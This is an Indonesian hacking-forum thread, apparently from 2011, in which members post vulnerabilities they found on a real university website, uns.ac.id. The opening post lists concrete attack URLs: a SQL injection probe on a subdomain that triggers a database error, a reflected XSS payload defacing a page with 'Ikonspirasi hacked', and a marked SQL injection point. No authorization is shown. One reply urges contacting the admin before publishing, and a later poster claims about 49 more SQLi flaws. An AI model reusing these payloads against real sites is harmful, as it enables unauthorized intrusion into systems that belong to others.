Pentest web server UNS.AC.ID
#1
disclaimer :
ini di pentest hanya untuk memperbaiki IT security di indonesia .. kita mencari bug nnti akan kita laporkan ke admin .. dengan tidak bermaksud merusak sama sekali.

hasil crawl

login admin default .. ntah palsu apa gk

Code:
http://www.uns.ac.id/login.php

hmmm celah dapat di temukan di subdomain

Code:
http://lppm.uns.ac.id/sirine/penelitian.php?act=jenisp&kds=S07%27

error koneksi database...

Code:
http://www.uns.ac.id/direktori_sdm/

ada yang bisa menambahkan ?
saya tambahkan xss ..

Code:
http://www.uns.ac.id//news_event.php/%22%3Ch1%3E%28Ikonspirasi%20hacked%29%3C/h1%3E%3E

SQLI Injection

Code:
http://www.uns.ac.id//news_event.php?act=ars&arsBln=%24{injecthere}&idMn=1

#2
Hmmm sekedar saran saja sih om Smile
Lebih baik, show bugnya setelah ada kesepakatan dari pihak admin yang telah dihubungi terlebih dahulu.
kita mengedepankan etika terlebih dahulu Smile

Lajur cerita :
1. Kita menemukan BUG.
2. email admin.
3. Jika sudah ditanggapi, dan sudah ada kabar fix. baru share bugnya
4. Tunggu 1 minggu bila belum ditanggapi, jika blm ditanggapi. share bugnya.

Hanya sekedar saran Smile
Yang putih, yang seharusnya ber-aksi dan berbakat!
Linuxtivist blog

#3
POC nya gk sekalian zee??? Big Grin
shendo@IBT:~# whoami
root
shendo@IBT:~# id
uid=0(root) gid=0(root) groups=0(root)
shendo@IBT:~#_

#4
weekkk aye bukan zee om shendo tpi m1rwan gnteng Sad

#5
lupa cara nginject =)) suram

#6
(12-06-2011, 01:14 PM)Andre_Corleone Wrote: lupa cara nginject =)) suram

wkwkwkw ...
bisa aja dahhh lu oms Confused

#7
new report vulnerability of uns.ac.id

ada sekitar 49 vulner sqli ane temukan
jadi kita kut saran om thjc dulu atau bagaimana ni?

mhaap telat report ^_^

#8
ikut saran om thjc dulu aje :p
kaborrrrrrrr Confused
Every Second, Every Minutes, Every Hours, Every Days Its Never End

#9
okdeh kalau ikut saran om thjc diumpet dulu aja listnya Big Grin

#10
sep Confused
Every Second, Every Minutes, Every Hours, Every Days Its Never End






Users browsing this thread: 1 Guest(s)